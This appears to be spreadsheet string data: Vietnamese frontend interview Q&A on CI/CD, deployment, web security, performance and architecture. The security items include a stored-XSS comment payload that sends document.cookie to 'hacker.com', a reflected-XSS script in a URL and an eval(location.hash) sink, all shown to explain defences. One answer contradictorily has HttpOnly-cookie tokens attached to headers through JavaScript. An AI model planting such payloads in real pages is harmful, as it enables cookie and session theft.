    <t>CI (Continuous Integration) là Tích hợp liên tục, tự động kiểm tra code mỗi khi có người push lên. CD (Continuous Delivery/Deployment) là Triển khai liên tục, tự động đẩy code đã kiểm tra lên máy chủ (Server).</t>
  </si>
  <si>
    <t>Ví dụ: Bạn gõ lệnh git push. Github tự động chạy máy soi lỗi (CI), soi xong không thấy lỗi thì tự động quăng file web lên mạng cho khách hàng xài (CD).</t>
  </si>
  <si>
    <t>CI giúp gì cho frontend?</t>
  </si>
  <si>
    <t>Giúp phát hiện sớm lỗi cú pháp, vỡ giao diện, hoặc logic sai trước khi đoạn code đó bị gộp (merge) vào nhánh chính.</t>
  </si>
  <si>
    <t>Chặn không cho bạn merge nhánh nếu phát hiện bạn viết thiếu dấu phẩy (lỗi ESLint) hoặc làm hỏng chức năng tính tiền (lỗi Unit Test).</t>
  </si>
  <si>
    <t>CD giúp gì?</t>
  </si>
  <si>
    <t>Loại bỏ hoàn toàn quy trình làm bằng tay (như nén file zip, dùng FTP kéo thả lên server). Đưa tính năng mới đến tay người dùng một cách nhanh chóng và an toàn.</t>
  </si>
  <si>
    <t>Bạn vừa sửa xong nút "Đăng nhập", bấm merge code, 30 giây sau toàn bộ khách hàng vào web đã thấy nút mới.</t>
  </si>
  <si>
    <t>Pipeline là gì?</t>
  </si>
  <si>
    <t>"Đường ống" chứa một chuỗi các tác vụ (jobs) chạy tự động theo thứ tự. Bước trước phải thành công thì bước sau mới được chạy.</t>
  </si>
  <si>
    <t>Ví dụ: Một pipeline chuẩn: Cài đặt thư viện ➡️ Kiểm tra mã (Lint) ➡️ Chạy Test ➡️ Đóng gói (Build) ➡️ Đưa lên mạng (Deploy).</t>
  </si>
  <si>
    <t>GitHub Actions là gì?</t>
  </si>
  <si>
    <t>Nền tảng tự động hóa CI/CD được tích hợp sẵn ngay bên trong GitHub. Bạn điều khiển nó bằng cách viết các file cấu hình đuôi .yml.</t>
  </si>
  <si>
    <t>Ví dụ: Bạn viết file deploy.yml ra lệnh: "Hễ có ai push lên nhánh main thì tự động chạy npm run build nhé".</t>
  </si>
  <si>
    <t>Build frontend trong CI gồm những bước nào?</t>
  </si>
  <si>
    <t>Luôn theo trình tự cứng: Clone code về máy ảo -&gt; Cài Dependencies (npm ci) -&gt; Kiểm tra chất lượng (Lint/Test) -&gt; Build sinh ra file tĩnh HTML/CSS/JS.</t>
  </si>
  <si>
    <t>Lint trong CI để làm gì?</t>
  </si>
  <si>
    <t>Đảm bảo tất cả thành viên trong team code cùng một chuẩn định dạng và không mắc các lỗi syntax ngớ ngẩn.</t>
  </si>
  <si>
    <t>Ví dụ: Dev A thích xài nháy đơn ('), Dev B thích xài nháy kép ("). CI sẽ chạy ESLint/Prettier ép tất cả về chung 1 kiểu, ai sai CI sẽ đánh dấu đỏ (Failed) chặn không cho gộp code.</t>
  </si>
  <si>
    <t>Test trong CI để làm gì?</t>
  </si>
  <si>
    <t>Đảm bảo tính năng mới bạn vừa viết không vô tình đấm vỡ tính năng cũ đang chạy ngon lành.</t>
  </si>
  <si>
    <t>Ví dụ: CI tự động mở một trình duyệt ảo, giả lập thao tác click vào giỏ hàng. Nếu giỏ hàng lỗi, CI sẽ réo tên bạn trên Github bắt sửa.</t>
  </si>
  <si>
    <t>Typecheck trong CI để làm gì?</t>
  </si>
  <si>
    <t>Dành cho các dự án dùng TypeScript. Chạy lệnh (VD: tsc --noEmit) để quét toàn bộ dự án xem có biến nào bị gán sai kiểu dữ liệu hay không.</t>
  </si>
  <si>
    <t>Ví dụ: API quy định id là số (Number) nhưng bạn truyền vào chữ (String) -&gt; Typecheck phát hiện và quăng lỗi từ trứng nước.</t>
  </si>
  <si>
    <t>Preview deployment là gì?</t>
  </si>
  <si>
    <t>Một bản sao "sống" của trang web được tạo ra riêng biệt cho mỗi một Pull Request (PR) chờ gộp.</t>
  </si>
  <si>
    <t>Vercel và Netlify là gì?</t>
  </si>
  <si>
    <t>Là các nền tảng đám mây (Cloud Platform) sinh ra để tối ưu hóa việc Host các dự án Frontend hiện đại (React/Vue/Next.js) với CI/CD được cấu hình tự động 100%.</t>
  </si>
  <si>
    <t>Ví dụ: Bạn chỉ cần đăng nhập Vercel, chọn repo Github của bạn. Bấm 1 nút, Vercel tự lấy code về build và cho bạn một đường link HTTPS ngay lập tức.</t>
  </si>
  <si>
    <t>CDN (Content Delivery Network) là gì?</t>
  </si>
  <si>
    <t>Ví dụ: Máy chủ gốc của bạn ở Mỹ. Nếu không có CDN, khách ở Việt Nam vào web sẽ load rất chậm. Có CDN, khách VN sẽ tải ảnh và CSS từ máy chủ CDN đặt tại Singapore hoặc VN -&gt; Tốc độ siêu nhanh.</t>
  </si>
  <si>
    <t>Static hosting là gì?</t>
  </si>
  <si>
    <t>Dịch vụ máy chủ siêu rẻ (thậm chí miễn phí) chỉ làm đúng một việc: Lưu trữ và gửi các file "chết" (HTML, CSS, JS, Ảnh) cho trình duyệt. Hoàn toàn không có tính toán logic Database ở đây.</t>
  </si>
  <si>
    <t>Ví dụ: Bạn đưa web lên Github Pages hoặc AWS S3.</t>
  </si>
  <si>
    <t>Docker là gì?</t>
  </si>
  <si>
    <t>Công cụ đóng gói ứng dụng (code + môi trường NodeJS + thư viện cài sẵn) vào một cái hộp gọi là "Container".</t>
  </si>
  <si>
    <t>Ví dụ: Thay vì setup máy ảo cài NodeJS lằng nhằng, bạn quăng cái hộp Docker lên bất kỳ Server nào (Windows hay Linux), nó đều chạy y hệt nhau. Giải quyết triệt để câu nói: "Ủa, trên máy em chạy bình thường mà ta!".</t>
  </si>
  <si>
    <t>Environment dev/staging/prod khác nhau thế nào?</t>
  </si>
  <si>
    <t>Lý thuyết: Phân tách các môi trường để đảm bảo an toàn.
Dev: Máy tính của lập trình viên.</t>
  </si>
  <si>
    <t>Staging: Máy chủ nháp, clone y hệt bản thật để QC/Tester vào phá thử.
Prod (Production): Máy chủ thật đang chạy cho khách hàng.</t>
  </si>
  <si>
    <t>Ví dụ: Ở Staging, web kết nối với thẻ ngân hàng ảo (cà thẻ không mất tiền). Ở Prod, web kết nối API ngân hàng thật.</t>
  </si>
  <si>
    <t>Rollback deployment là gì?</t>
  </si>
  <si>
    <t>"Quay xe". Khôi phục ứng dụng về phiên bản chạy ổn định trước đó ngay lập tức khi bản cập nhật mới bị lỗi nghiêm trọng.</t>
  </si>
  <si>
    <t>Ví dụ: Vừa push code v2 lên thì bị màn hình trắng trang. Bạn lên Vercel bấm nút "Rollback" để khách hàng dùng lại v1 trong lúc bạn tìm cách sửa lỗi v2.</t>
  </si>
  <si>
    <t>Feature flag là gì?</t>
  </si>
  <si>
    <t>"Công tắc tính năng". Kỹ thuật dùng biến môi trường để bật/tắt hiển thị một chức năng mới ngay trên bản Production mà KHÔNG cần phải deploy lại code.</t>
  </si>
  <si>
    <t>Code chức năng "Flash Sale" đã được đưa lên mạng xong xuôi từ 3 ngày trước nhưng bị ẩn. Đúng 0h00 đêm, Sếp vào phần quản trị bật công tắc ENABLE_FLASH_SALE = true, lúc này giao diện mới bung ra cho khách xem.</t>
  </si>
  <si>
    <t>Canary release là gì?</t>
  </si>
  <si>
    <t>: Phát hành kiểu "Thả chim hoàng yến thăm dò". Tính năng mới được tung ra cho một tỷ lệ rất nhỏ người dùng (VD: 5%) dùng thử. Nếu không có lỗi gì phát sinh, mới mở dần lên 100%.</t>
  </si>
  <si>
    <t>Ví dụ: Facebook đổi giao diện mới. Máy của bạn tự dưng bị đổi sang giao diện mới, nhưng máy của bạn bè bạn thì vẫn là giao diện cũ. Khoảng 1 tháng sau thì tất cả mọi người mới bị đổi.</t>
  </si>
  <si>
    <t>Stored XSS là gì? (XSS lưu trữ)</t>
  </si>
  <si>
    <t>Mã độc được lưu vĩnh viễn vào Database của Server. (Ví dụ: Hacker viết comment chứa mã độc vào bài viết. Bất kỳ ai mở bài viết đó lên xem đều bị dính chưởng).</t>
  </si>
  <si>
    <t>Ví dụ: Bình luận có nội dung &lt;script&gt;fetch('hacker.com?cookie='+document.cookie)&lt;/script&gt;.</t>
  </si>
  <si>
    <t>Reflected XSS là gì? (XSS phản xạ)</t>
  </si>
  <si>
    <t>Mã độc không lưu vào DB, mà nằm ngay trên đường link URL. Hacker dụ nạn nhân click vào link.</t>
  </si>
  <si>
    <t>Ví dụ: https://shop.com/search?q=&lt;script&gt;alert('Bị hack')&lt;/script&gt;. Nếu Frontend lấy thẳng chữ q trên URL in ra màn hình mà không lọc, mã sẽ chạy.</t>
  </si>
  <si>
    <t>DOM-based XSS là gì?</t>
  </si>
  <si>
    <t>Toàn bộ quá trình hack diễn ra thuần túy ở Frontend bằng JavaScript (can thiệp thẳng vào DOM), Server không hề biết.</t>
  </si>
  <si>
    <t>Ví dụ: Hàm eval(window.location.hash) sẽ chạy bất kỳ đoạn code nào nằm sau dấu # trên URL.</t>
  </si>
  <si>
    <t>Làm sao phòng chống XSS?</t>
  </si>
  <si>
    <t>Tuyệt đối không tin tưởng bất kỳ dữ liệu nào người dùng nhập vào. Phải "Escape" (Mã hóa ký tự đặc biệt như &lt; thành &amp;lt;) trước khi in ra màn hình. Sử dụng CSP (câu 13).</t>
  </si>
  <si>
    <t>React có chống XSS mặc định không?</t>
  </si>
  <si>
    <t>CÓ. Khi bạn viết &lt;div&gt;{userInput}&lt;/div&gt;, React sẽ tự động Escape mọi mã HTML. Kẻ gian nhập &lt;script&gt; thì React sẽ in ra màn hình đúng cái chữ &lt;script&gt; vô hại bằng văn bản thuần.</t>
  </si>
  <si>
    <t>CSRF là gì? (Cross-Site Request Forgery)</t>
  </si>
  <si>
    <t>Giả mạo yêu cầu. Hacker lừa bạn bấm vào một nút/ảnh trên web của chúng, nhưng thực chất là lén gửi một request lên Server ngân hàng của bạn.</t>
  </si>
  <si>
    <t>Vì bạn đang đăng nhập sẵn ở ngân hàng, trình duyệt tự động gửi kèm Cookie, khiến Server tưởng chính bạn đang thao tác.</t>
  </si>
  <si>
    <t>Làm sao phòng chống CSRF?</t>
  </si>
  <si>
    <t>Cách 1: Backend gửi kèm một mã Anti-CSRF Token ẩn trong form.
Cách 2: (Hiện đại) Gắn cờ SameSite cho Cookie (Xem câu 18).</t>
  </si>
  <si>
    <t>CORS có chống CSRF không?</t>
  </si>
  <si>
    <t>KHÔNG. CORS sinh ra để chặn việc đọc dữ liệu trả về từ một domain khác, chứ nó KHÔNG chặn trình duyệt gửi dữ liệu đi (như gửi qua Form POST HTML thuần). CSRF lợi dụng việc gửi đi này.</t>
  </si>
  <si>
    <t>Clickjacking là gì?</t>
  </si>
  <si>
    <t>Hacker tạo ra một trang web, nhét trang web thật của bạn vào một cái &lt;iframe&gt;, làm cho iframe đó trong suốt (tàng hình) và đè lên một nút bấm vô hại. Nạn nhân tưởng đang bấm "Chơi Game", nhưng thực ra là đang bấm nút "Chuyển Tiền" ở iframe tàng hình.</t>
  </si>
  <si>
    <t>Phòng chống: Backend cấu hình Header X-Frame-Options: DENY (cấm web khác nhúng web mình vào iframe).</t>
  </si>
  <si>
    <t>CSP là gì? (Content Security Policy)</t>
  </si>
  <si>
    <t>Là một cái Header do Server gửi về báo cho trình duyệt: "Web của tôi chỉ được phép tải ảnh từ domain A, chạy JS từ domain B. Cấm chạy code JS inline". Đây là liều thuốc giải độc mạnh nhất chống lại XSS.</t>
  </si>
  <si>
    <t>Ví dụ: Content-Security-Policy: default-src 'self' https://api.myweb.com;</t>
  </si>
  <si>
    <t>SRI là gì? (Subresource Integrity)</t>
  </si>
  <si>
    <t>Khi bạn nhúng thư viện từ CDN (như Bootstrap), nhỡ CDN đó bị hack và tráo file JS thì sao? SRI giải quyết bằng cách cung cấp một mã Hash. Trình duyệt tải file JS về, nếu mã Hash không khớp -&gt; Hủy không chạy.</t>
  </si>
  <si>
    <t>Ví dụ: &lt;script src="https://cdn..." integrity="sha384-abcxyz..." crossorigin="anonymous"&gt;&lt;/script&gt;</t>
  </si>
  <si>
    <t>HTTPS quan trọng thế nào?</t>
  </si>
  <si>
    <t>Nó mã hóa toàn bộ dữ liệu truyền giữa trình duyệt và Server. Nếu dùng HTTP thường, Hacker chung mạng WiFi quán cafe có thể đọc trộm toàn bộ mật khẩu, Cookie, mã thẻ tín dụng của bạn (Tấn công Man-in-the-Middle).</t>
  </si>
  <si>
    <t>Token nên lưu ở localStorage hay cookie?</t>
  </si>
  <si>
    <t>LocalStorage: Rất tiện cho React, nhưng cực kỳ nguy hiểm nếu web dính XSS (Mã độc JS có thể đọc được localStorage.getItem('token')).</t>
  </si>
  <si>
    <t>Cookie: An toàn hơn nhiều vì có thể gắn cờ HttpOnly. Lời khuyên: Hãy lưu Access Token/Refresh Token vào Cookie.</t>
  </si>
  <si>
    <t>HttpOnly cookie giúp gì?</t>
  </si>
  <si>
    <t>Nó cấm JavaScript đọc Cookie đó. Chỉ có trình duyệt mới được quyền tự động đính kèm Cookie đó gửi lên Server. Xóa sổ hoàn toàn rủi ro Hacker dùng XSS (như document.cookie) để ăn cắp Token.</t>
  </si>
  <si>
    <t>SameSite cookie giúp gì?</t>
  </si>
  <si>
    <t>Bảo vệ khỏi CSRF.
SameSite=Strict: Tuyệt đối không gửi cookie nếu request xuất phát từ một web khác.</t>
  </si>
  <si>
    <t>SameSite=Lax: Chặn gửi cookie qua form cross-site, nhưng cho phép gửi nếu người dùng click vào link chuyển trang &lt;a href&gt;.</t>
  </si>
  <si>
    <t>npm audit dùng để làm gì?</t>
  </si>
  <si>
    <t>Là lệnh Terminal giúp quét toàn bộ file package-lock.json đối chiếu với CSDL bảo mật toàn cầu. Nó sẽ báo cáo cho bạn biết: "Thư viện X bản 1.0 đang bị lỗi XSS, hãy nâng cấp lên 2.0".</t>
  </si>
  <si>
    <t>CDN (Content Delivery Network)?</t>
  </si>
  <si>
    <t>CDN là mạng lưới máy chủ phân tán toàn cầu. Server chính ở Mỹ, nhưng khách VN vào web sẽ tải ảnh/CSS từ trạm CDN đặt tại Viettel/FPT -&gt; Siêu nhanh. (Vercel, Cloudflare là các CDN).</t>
  </si>
  <si>
    <t>ETag là gì?</t>
  </si>
  <si>
    <t xml:space="preserve">Là "Mã vân tay" của một file. Trình duyệt gửi ETag lên, Server kiểm tra nếu ETag khớp (file chưa bị ai sửa), Server sẽ trả về mã 304 Not Modified. </t>
  </si>
  <si>
    <t>Trình duyệt lấy file cũ từ ổ cứng ra dùng, tiết kiệm băng thông.</t>
  </si>
  <si>
    <t>Service Worker caching là gì?</t>
  </si>
  <si>
    <t>Một đoạn JS chạy ngầm (nền tảng của PWA). Nó có thể đánh chặn mọi request mạng. Cực mạnh vì nó giúp web của bạn vẫn truy cập được ngay cả khi mất mạng (Offline).</t>
  </si>
  <si>
    <t>Memory leak (Rò rỉ bộ nhớ) là gì?</t>
  </si>
  <si>
    <t>Bộ nhớ RAM của máy tính bị web của bạn "ăn" mất dần dần mà không chịu nhả ra. Web mở càng lâu càng giật, cuối cùng crash trang (Màn hình Aw, Snap! của Chrome).</t>
  </si>
  <si>
    <t>Làm sao detect memory leak?</t>
  </si>
  <si>
    <t>Mở Chrome DevTools -&gt; Tab Memory -&gt; Bấm chụp "Heap Snapshot" -&gt; Chuyển qua lại các trang vài lần rồi chụp lại. Nếu dung lượng cấp phát tăng liên tục không giảm là dính Leak.</t>
  </si>
  <si>
    <t xml:space="preserve"> (Nguyên nhân chính: Bật setInterval nhưng unmount quên clearInterval, hoặc gán Event Listener vào thẻ window nhưng quên xóa).</t>
  </si>
  <si>
    <t>Lỗi Infinite scroll và Virtual List?</t>
  </si>
  <si>
    <t>Vấn đề: Cuộn vô tận trên Facebook. Nếu bạn cuộn 1 tiếng, DOM sẽ nhồi vào 10,000 thẻ &lt;div&gt; bài viết. Web sẽ siêu lag.</t>
  </si>
  <si>
    <t>Giải pháp (Virtual List): Dù có 10,000 bài viết, ta chỉ render đúng 10 thẻ &lt;div&gt; đang lọt vào tầm nhìn của màn hình. Cuộn xuống thì tái sử dụng các thẻ đó (thay nội dung). Thư viện phổ biến: react-window.</t>
  </si>
  <si>
    <t>Skeleton loading có cải thiện performance thật không?</t>
  </si>
  <si>
    <t>Về mặt kỹ thuật: KHÔNG. Tốc độ tải vẫn thế.</t>
  </si>
  <si>
    <t>UI khác UX thế nào?</t>
  </si>
  <si>
    <t>UI (User Interface): Là Giao diện người dùng (Cái nhìn thấy). Gồm màu sắc, nút bấm, font chữ.</t>
  </si>
  <si>
    <t>UX (User Experience): Là Trải nghiệm người dùng (Cái cảm nhận). Gồm luồng đi, tốc độ, sự dễ dàng.</t>
  </si>
  <si>
    <t>Ví dụ kinh điển: Chai tương cà Heinz. Chai thủy tinh đứng (UI đẹp, nhìn sang) nhưng lấy tương rất khó (UX tệ). Chai nhựa để lộn ngược (UI bình thường) nhưng bóp tương ra rất dễ (UX tuyệt vời).</t>
  </si>
  <si>
    <t>Layer-based vs Feature-based structure?</t>
  </si>
  <si>
    <t>Layer-based (Cấu trúc theo lớp/loại file): Gom tất cả Components vào 1 thư mục, Hooks vào 1 thư mục. Rất dễ bị rối khi dự án lên tới hàng trăm file.</t>
  </si>
  <si>
    <t>Feature-based (Cấu trúc theo tính năng): (Khuyên dùng). Nhóm mọi thứ liên quan đến một chức năng vào chung 1 folder.</t>
  </si>
  <si>
    <t>Ví dụ Feature-based: Thư mục features/cart sẽ chứa Cart.tsx (UI), useCart.ts (Logic), và cartApi.ts (Gọi mạng). Sửa giỏ hàng chỉ cần vào đúng folder này.</t>
  </si>
  <si>
    <t>Shared components nên đặt ở đâu?</t>
  </si>
  <si>
    <t>Đặt ở một thư mục dùng chung (thường là src/components/common hoặc src/shared/ui). Đây là các component "ngu" (Dumb components) như Nút bấm (Button), Ô nhập (Input), Hộp thoại (Modal) không chứa logic nghiệp vụ.</t>
  </si>
  <si>
    <t>Separation of concerns (SoC) là gì?</t>
  </si>
  <si>
    <t>Nguyên lý "Chia tách các mối quan tâm". UI chỉ lo vẽ giao diện, API chỉ lo gọi mạng, State chỉ lo lưu trữ dữ liệu. Không nhồi nhét tất cả vào 1 file.</t>
  </si>
  <si>
    <t>function UserPage() {
  const [users, setUsers] = useState([]);
  useEffect(() =&gt; {
    fetch('/api/users')
      .then(res =&gt; res.json())
      .then(data =&gt; {
        const activeUsers = data.filter(x =&gt; x.active);
        setUsers(activeUsers);
      });
  }, []);
  return (
    &lt;div&gt;
      {users.map(user =&gt; (
        &lt;p&gt;{user.name}&lt;/p&gt;
      ))}
    &lt;/div&gt;
  );
}</t>
  </si>
  <si>
    <t>Component này đang làm quá nhiều việc:
Gọi API
Xử lý business logic (filter)
Render UI
=&gt; Vi phạm SoC</t>
  </si>
  <si>
    <t>DTO, Domain Model và Mapper function?</t>
  </si>
  <si>
    <t>DTO (Data Transfer Object): Dữ liệu thô từ API trả về (Ví dụ: user_first_name).
Domain Model: Cấu trúc chuẩn mà Frontend của bạn sẽ dùng (Ví dụ: firstName).
Mapper function: Hàm chuyển đổi từ DTO sang Model.</t>
  </si>
  <si>
    <t>Ví dụ: const mapUser = (dto) =&gt; ({ firstName: dto.user_first_name }). Toàn bộ App sẽ dùng firstName, nếu Backend đổi API, bạn chỉ cần sửa đúng 1 dòng ở hàm Mapper.</t>
  </si>
  <si>
    <t>Clean Architecture và Dependency direction?</t>
  </si>
  <si>
    <t>Dependency direction (Hướng phụ thuộc): Luôn đi từ ngoài vào trong. Lớp UI (Bên ngoài) phụ thuộc vào Lớp Logic (Bên trong). Lớp Logic KHÔNG BAO GIỜ được gọi lớp UI.</t>
  </si>
  <si>
    <t>Clean Architecture ở Frontend: Tách dự án thành 3 lớp: Presentation (UI/Components) -&gt; Domain (Logic lõi/State) -&gt; Data (API/Storage).</t>
  </si>
  <si>
    <t>Micro frontend (MFE) và Ưu nhược điểm?</t>
  </si>
  <si>
    <t>Giống như Microservices ở Backend. MFE xé một trang web khổng lồ thành nhiều app nhỏ do các Team khác nhau làm, rồi ghép lại trên 1 màn hình.
Ưu điểm: Team A (dùng React) làm Thanh tìm kiếm, Team B (dùng Vue) làm Giỏ hàng. Hai team deploy độc lập không chờ nhau.</t>
  </si>
  <si>
    <t>Nhược điểm: Quá phức tạp để setup, dễ bị trùng lặp thư viện gây nặng file Bundle. Chỉ dùng cho công ty cực lớn.</t>
  </si>
  <si>
    <t>Module Federation là gì?</t>
  </si>
  <si>
    <t>Là tính năng đột phá của Webpack 5. Nó cho phép ứng dụng của bạn tải động code (Component) từ một ứng dụng khác đang chạy ở một domain khác ngay lúc runtime (lúc khách hàng đang mở trình duyệt).</t>
  </si>
  <si>
    <t xml:space="preserve"> Đây là xương sống của MFE hiện đại.</t>
  </si>
  <si>
    <t>Error handling architecture nên thế nào?</t>
  </si>
  <si>
    <t>Lớp mạng (API): Bắt lỗi 401/500 ở Axios Interceptor và hiện Toast chung.</t>
  </si>
  <si>
    <t>Lớp UI: Dùng Error Boundary bọc xung quanh các Component. Nhỡ 1 phần tử con bị lỗi Javascript (crash), Error Boundary sẽ hiện màn hình "Có lỗi xảy ra" thay vì để cả trang web bị trắng xóa màn hình.</t>
  </si>
  <si>
    <t>Monitoring frontend là gì?</t>
  </si>
  <si>
    <t>Giám sát sức khỏe ứng dụng sau khi tung ra thị trường (Dùng Google Analytics hoặc Sentry). Giúp bạn biết được:
Tốc độ tải trang (LCP, CLS) trên máy khách hàng đang là bao nhiêu giây?</t>
  </si>
  <si>
    <t>Hôm nay có bao nhiêu User bị văng app do lỗi?
API nào đang phản hồi chậm nhất làm ảnh hưởng Frontend?</t>
  </si>
  <si>
    <t>Skeleton animation nên chú ý gì?</t>
  </si>
  <si>
    <t>Skeleton là các khối xám nhấp nháy giữ chỗ trong lúc chờ API trả dữ liệu về. Khi làm hiệu ứng cho Skeleton, cần chú ý 3 nguyên tắc sống còn về UX/UI:
Khớp Layout (Chống CLS): Khung Skeleton phải có kích thước (width, height) KHỚP CHÍNH XÁC 100% với nội dung thật sắp hiển thị. Nếu không, khi data về, giao diện sẽ bị giật/nhảy (Layout Shift) rất khó chịu.</t>
  </si>
  <si>
    <t>Animation tinh tế: Đừng dùng hiệu ứng chớp tắt (Fade in/out) quá gắt. Hãy dùng hiệu ứng Shimmer (Một luồng sáng lướt qua nhẹ nhàng từ trái sang phải) để tạo cảm giác tiến triển mượt mà.
Tránh nhấp nháy màn hình (Flickering): Nếu API trả về quá nhanh (dưới 300ms), việc hiện Skeleton lên chớp 1 cái rồi mất sẽ làm UX tệ hơn. Hãy set một khoảng delay nhỏ, chỉ hiện Skeleton nếu mạng thực sự load chậm hơn 300ms.</t>
  </si>
  <si>
    <t>CSS transition là gì?</t>
  </si>
  <si>
    <t>transition (Chuyển đổi) là cách đơn giản nhất để tạo hiệu ứng. Nó giúp một thuộc tính CSS thay đổi từ giá trị A sang giá trị B một cách mượt mà trong một khoảng thời gian nhất định, thay vì biến đổi đột ngột.</t>
  </si>
  <si>
    <t>Đặc điểm: Bắt buộc phải có một "cú hích" (trigger) để chạy, ví dụ như người dùng di chuột vào (:hover), click vào (:active), hoặc dùng JS để thêm/xóa một class.</t>
  </si>
  <si>
    <t>CSS animation là gì?</t>
  </si>
  <si>
    <t>animation mạnh mẽ và phức tạp hơn transition. Nó sử dụng @keyframes để định nghĩa nhiều giai đoạn (bước) của một hoạt ảnh.</t>
  </si>
  <si>
    <t>Đặc điểm: Không cần hành động kích hoạt (có thể tự chạy ngay khi load trang), có thể lặp đi lặp lại vô tận (infinite), và có thể tạm dừng.</t>
  </si>
  <si>
    <t>i18n là gì?</t>
  </si>
  <si>
    <t>Lý thuyết: i18n viết tắt của Internationalization (chữ 'i', 18 chữ cái ở giữa, rồi đến chữ 'n'). Đây là quá trình chuẩn bị nền tảng/kiến trúc cho phần mềm để nó có thể dễ dàng hiển thị nhiều ngôn ngữ khác nhau mà không cần đập đi viết lại source code.</t>
  </si>
  <si>
    <t>Ví dụ: Thay vì gõ chết chữ vào giao diện, bạn thiết lập thư viện (như react-i18next) để tách toàn bộ chữ ra một file riêng.</t>
  </si>
  <si>
    <t>l10n là gì?</t>
  </si>
  <si>
    <t>Lý thuyết: l10n viết tắt của Localization (Bản địa hóa). Đây là quá trình thực thi việc dịch thuật và điều chỉnh hình ảnh, màu sắc của phần mềm cho phù hợp với văn hóa của một quốc gia cụ thể (dựa trên nền tảng i18n đã xây).</t>
  </si>
  <si>
    <t>Ví dụ: i18n là việc tạo ra khung hỗ trợ dịch. l10n là việc bạn thuê người dịch file text sang tiếng Nhật và đổi banner từ hình "Ông già Noel" sang hình "Hoa anh đào".</t>
  </si>
  <si>
    <t>Translation key là gì?</t>
  </si>
  <si>
    <t>Lý thuyết: Là mã ID duy nhất dùng trong source code để đại diện cho một đoạn văn bản. App sẽ lấy Key này đi dò trong file ngôn ngữ (JSON) để in ra chữ thật.</t>
  </si>
  <si>
    <t>Ví dụ: * Trong code React: &lt;h1&gt;{t('home.welcome')}&lt;/h1&gt;
Trong file vi.json: { "home.welcome": "Chào mừng bạn" }</t>
  </si>
  <si>
    <t>SEO với multi-language site xử lý thế nào?</t>
  </si>
  <si>
    <t>Lý thuyết: Google Bot rất ghét các trang web dùng chung 1 đường link (URL) nhưng nội dung bên trong lại thay đổi chớp nhoáng theo ngôn ngữ dựa vào Client-side JS. Bạn phải tạo URL riêng biệt cho từng ngôn ngữ và dùng thẻ hreflang để báo cho Google biết.</t>
  </si>
  <si>
    <t>Ví dụ: * URL chia rõ ràng: shop.com/en/shoes và shop.com/vi/shoes.
Thêm thẻ này vào &lt;head&gt; để báo Google: &lt;link rel="alternate" hreflang="vi" href="https://shop.com/vi/shoes" /&gt;</t>
  </si>
  <si>
    <t>Chat app (Ứng dụng chat)?</t>
  </si>
  <si>
    <t>Lý thuyết: Giao tiếp 2 chiều độ trễ thấp, xử lý tin nhắn offline, và cuộn ngược (Reverse infinite scroll).</t>
  </si>
  <si>
    <t>Ví dụ: Tích hợp thư viện Yjs cùng WebSockets để đồng bộ hóa các thao tác gõ phím giữa nhiều client theo thời gian thực.</t>
  </si>
  <si>
    <t>File upload lớn ?</t>
  </si>
  <si>
    <t>Lý thuyết: Tránh đứt mạng giữa chừng bằng kỹ thuật Chunking (Băm nhỏ file), hỗ trợ Resume (Tải lại từ điểm đứt) và hiển thị thanh tiến trình.</t>
  </si>
  <si>
    <t>Ví dụ: File video 2GB được băm thành 400 chunk (mỗi chunk 5MB). Dùng hàm slice() của File API rồi đẩy tuần tự lên Server qua Axios.</t>
  </si>
  <si>
    <t>Video streaming UI?</t>
  </si>
  <si>
    <t>Lý thuyết: Không tải cả video 1 lần. Dùng giao thức HLS/DASH để stream từng đoạn nhỏ, tự động đổi chất lượng (360p/720p) theo tốc độ mạng.</t>
  </si>
  <si>
    <t>Ví dụ: Nhúng thư viện video.js hoặc hls.js vào thẻ &lt;video&gt;, thiết kế các nút điều khiển (Play/Pause, Tua) đè lên trên bằng CSS tuyệt đối.</t>
  </si>
  <si>
    <t>Role-based access UI (Phân quyền RBAC)</t>
  </si>
  <si>
    <t>Lý thuyết: Ẩn/hiện tính năng và chặn đường dẫn (Route) dựa trên vai trò của người dùng.</t>
  </si>
  <si>
    <t>Ví dụ: Viết một HOC &lt;RequireAuth role="ADMIN"&gt;. Đọc token (như JWT từ Keycloak) để xem User có quyền không, không có thì đá về trang 403.</t>
  </si>
  <si>
    <t>Frontend logging/monitoring</t>
  </si>
  <si>
    <t>Lý thuyết: Không thể dùng console.log trên Production. Phải có công cụ tự động gom lỗi JS, thiết bị, môi trường gửi về Server.</t>
  </si>
  <si>
    <t>Ví dụ: Nhúng SDK của Sentry vào file index.js. Dùng Error Boundary bọc toàn App để khi có component Crash, báo cáo sẽ lập tức bay về dashboard Sentry.</t>
  </si>
  <si>
    <t>Bạn đã tối ưu performance như thế nào?</t>
  </si>
  <si>
    <t>Đo lường ➡️ Phát hiện bệnh ➡️ Xử lý ➡️ Đo lường lại. Đưa ra số liệu phần trăm hoặc mili-giây cụ thể.</t>
  </si>
  <si>
    <t xml:space="preserve">Tôi dùng React DevTools Profiler và Lighthouse để đo lường, phát hiện chỉ số INP và CLS rất kém do mảng dữ liệu quá dài và ảnh không được định cỡ. </t>
  </si>
  <si>
    <t>Tôi đã áp dụng kỹ thuật ảo hóa danh sách (Virtual List) bằng react-window để chỉ render những dòng hiển thị trên màn hình, bọc useCallback cho các hàm sự kiện truyền xuống component con, và thiết lập min-height cho các khung skeleton. Kết quả chỉ số LCP giảm từ 4s xuống dưới 1.8s, dung lượng bundle size giảm 35% nhờ Tree-shaking và Lazy-loading</t>
  </si>
  <si>
    <t>Bạn từng xử lý bug production nghiêm trọng chưa?</t>
  </si>
  <si>
    <t>Thể hiện sự bình tĩnh, quy trình xử lý khủng hoảng có trách nhiệm: Cô lập lỗi ➡️ Khắc phục tạm thời (Rollback/Hotfix) ➡️ Tìm nguyên nhân gốc rễ (Root cause) ➡️ Đề xuất giải pháp ngăn chặn tương lai.</t>
  </si>
  <si>
    <t>Xử lý hệ thống Đăng nhập SSO tập trung thế nào?</t>
  </si>
  <si>
    <t>Trong dự án, em tích hợp hệ thống với cổng SSO (Keycloak). Khi user đăng nhập thành công qua Keycloak, Frontend nhận về cặp Access Token và Refresh Token.</t>
  </si>
  <si>
    <t>Để đảm bảo an toàn bảo mật, team đã cấu hình lưu trữ token trong HTTP-only Cookie để chống tấn công XSS. Em sử dụng Axios Interceptors để tự động đính kèm Access Token vào header Authorization: Bearer của mỗi request gửi lên server."</t>
  </si>
  <si>
    <t>Dùng Ant Design kết hợp Styled-components có bị conflict CSS không? Cách đè style?</t>
  </si>
  <si>
